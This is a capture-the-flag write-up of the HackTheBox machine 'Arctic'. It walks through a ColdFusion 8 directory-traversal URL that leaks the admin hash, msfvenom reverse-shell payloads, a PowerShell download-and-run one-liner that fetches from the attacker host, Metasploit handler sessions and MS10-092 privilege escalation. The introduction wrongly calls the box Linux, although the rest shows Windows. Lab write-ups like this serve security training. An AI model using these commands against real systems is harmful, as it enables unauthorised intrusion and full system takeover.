TL;DR
This is a writeup on Arctic which is a Linux box categorized as easy on HackTheBox, and has Adobe’s ColdFusion as a primary service running on it. The exploitation essentially leverages enumeration and CVEs, namely Adobe ColdFusion – Directory Traversal & MS10_092. Interestingly, it does require us to escalate the user privileges for obtaining the root flag.
Walkthrough
Before, we start, I want to let you know that this particular box Arctic on HackTheBox has got some serious latency issue. It took about 20-30 seconds to serve each request, and it sadly kept dying on me. I had to reset it a few times, thus as a result you might notice different IP addresses for the box in the included screenshots and commands.
Arctic Writeup: Scanning Network
Let’s start off by running an obvious nmap scan.
# Nmap 7.70 scan initiated as: nmap -sC -sV -oA nmap.basic 10.129.156.45
Nmap scan report for 10.129.150.85
Host is up (0.16s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
So, the scan has returned with 3 open ports 135, 8500, 49154. Among which, the 135 & 49154 are running basic RPC service. Let’s first explore port 8500 as it seems interesting.
Arctic Writeup: Enumeration
Starting off with the browser view of port 8500.
We find two directories, namely CFIDE & cfdocs. Enumerating further with CFIDE/
We have a plenty of files and directories in here. But, administrator sounds worthy enough to be explored first π
Okay, so we have a login page of “ColdFusion 8” running here, with the username locked to admin.
You can check out this link to learn more about Adobe’s ColdFusion.
I also googled about the changelog for ColdFusion 8 and found out that there was only a single sub-version of version 8 i.e. “ColdFusion v8.0.1“. Thus, we can be sure that we are dealing with ColdFusion v8.0.1 here. It’s always wise to do version enumeration, you never know where it may help you out π
I did try a few default passwords like “admin“, “password“, etc. but no luck with them. And I couldn’t afford to brute-fore my way in because this box took freaking 30 seconds to respond to every request.
Arctic Writeup: Exploitation
So, better search for some exploits available for ColdFusion 8
I found this Directory Traversal exploit on ExploitDB
Arctic Writeup: Using the Directory Traversal Exploit
Modifying the URL (as per the instructions in the exploit) –
http://10.129.150.104:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
The exploit did work and reveals a password hash
Password Hash-->
password = 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03Analyzing the password hash
Using a hash identifier website I found out that the hash type is SHA1
Further trying a few websites for SHA1 hash decryption I was able to decrypt the password hash using this site
password = happyday
Great! Now, after trying the password obtained, we were logged in as “Administrator“.
Arctic Writeup: Getting a reverse shell
There are a hell lot of things to do here but what’s of use to us is the “Scheduling Tasks” service under the “Debugging & Logging” section, which ColdFusion offers and allows us to upload files.
I will be creating a reverse shell in jsp using msfvenom, to upload.
Why jsp?
It’s because after I took a lil hint from the walkthroughs, I learn that ColdFusion serves and runs jsp files.
Creating a jsp reverse shell using msfvenom (fit in the LHOST and LPORT values) –>
ββ[root@kali]β[~/Desktop/Arctic HTB]
ββββΌ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.52 LPORT=8500 > shell.jsp
Payload size: 1500 bytesLet’s copy this reverse shell file into our apache web server directory i.e. /var/www/sheerazali.com/
ββ[root@kali]β[~/Desktop/Arctic HTB]
ββββΌ cp shell.jsp /var/www/sheerazali.com/and start the apache server on our machine.
ββ[root@kali]β[~/Desktop/Arctic HTB]
ββββΌ service apache2 startChecking the localhost webpage to ensure that we have the file “shell.jsp” hosted.
Now, let’s schedule a task in ColdFusion to visit this "shell.jsp” file on our server and do the magic π
I will add the URL of our server where the “shell.jsp” file resides i.e. http://10.10.14.52/shell.jsp and will also specify the destination path to save the file on the box i.e. C:\ColdFusion8\wwwroot\CFIDE\shell.jsp
Once, the task is scheduled, Run it !
It will take a while, and then give a message “This scheduled task was completed successfully.“
Verifying that we have successfully uploaded “shell.jsp” to the CFIDE directory.
So, yes shell.jsp is successfully uploaded.
let’s open up the listening port 8500 on our machine (as 8500 was the port we mentioned as LPORT in the shell.jsp)
ββ[root@kali]β[~/Desktop/Arctic HTB]
ββββΌ nc -nlvp 8500
listening on [any] 8500 β¦Let’s now visit the URL to "shell.jsp” file on the box http://10.129.150.104:8500/CFIDE/shell.jsp
Yay! We have a reverse shell!
Arctic Writeup: User Flag
On running the command “whoami” we find out that the current user is “tolis“
Voilaπ We have the user flag. Now we gotta escalate our privileges.
Arctic Writeup: Root Flag
Getting a reverse meterpreter shell
Now, because this is just a reverse shell, let us try getting a meterpreter session on the box
Let’s create a windows reverse meterpreter shell using msfvenom β>
ββ[root@kali]β[~/Desktop/Arctic HTB]
ββββΌ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.52 LPORT=8500 -f exe > met_shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytesAnd copy it to the server directory to be able to host this file on the server.
ββ[root@kali]β[~/Desktop/Arctic HTB]
ββββΌ cp met_shell.exe /var/www/sheerazali.com/now let’s run this powershell command in the normal reverse shell we obtainer earlier,
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.14.52/met_shell.exe','meterpreter.exe')"So, now we have the “meterpreter.exe” on the box
Let’s use the “exploit/multi/handler" on metasploit
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set LHOST 10.10.14.52
LHOST => 10.10.14.52
msf5 exploit(multi/handler) > set LPORT 8500
LPORT => 8500
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.52:8500 Now let’s run the “meterpreter.exe” file on the box using our current shell.
And there we have our reverse meterpreter shell π
PS– We are running a x86 meterpreter session on a x64 box.
I also tried out the command “getsystem” to gain root, you know just in case π but it didn’t work lol
Now, lets run the “local_exploit_suggester". This module basically suggests any exploits that the box is vulnerable against.
meterpreter >
Background session 1? [y/N]
msf5 exploit(multi/handler) > search suggest
Matching Modules
# Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
0 auxiliary/server/icmp_exfil normal No ICMP Exfiltration Service
1 exploit/windows/browser/ms10_018_ie_behaviors 2010-03-09 good No MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free
2 exploit/windows/smb/timbuktu_plughntcommand_bof 2009-06-25 great No Timbuktu PlughNTCommand Named Pipe Buffer Overflow
3 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
4 post/osx/gather/enum_colloquy normal No OS X Gather Colloquy Enumeration
5 post/osx/manage/sonic_pi normal No OS X Manage Sonic Pi
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf5 post(multi/recon/local_exploit_suggester) > runOK so we have some interesting results,
Also, because we are running an x86 architecture meterpreter session on an x64 architecture box, we should additionally try to migrate our meterpreter session to an x64 architecture and re-run the “local_exploit_suggester” module as they may return different results.
Arctic Writeup: Migrating meterpreter shell
So, lets migrate our x86 meterpreter session into an x64 version.
Let’s choose a process with x64 Architecture,
I will be avoiding “powershell.exe” because using it may cause this process to die, and if “powershell.exe" dies our meterpreter session dies.
Let’s use “jrun.exe" with “pid = 1140“
So. now we have successfully migrated into an x64 version meterpreter session. Lets re-run the “local_exploit_suggester"
Comparing the two results from x86 session and x64 session, we can deduce that “exlpoit/windows/local/ms10_092_scelevator” which is ideal for escalating privileges is common to both. Let’s try the exploit “ms10_092“
Awesome! π₯³ We are AUTHORITY\SYSTEM . Here’s the root flag.
Until next box, checkout other intriguing writeups here
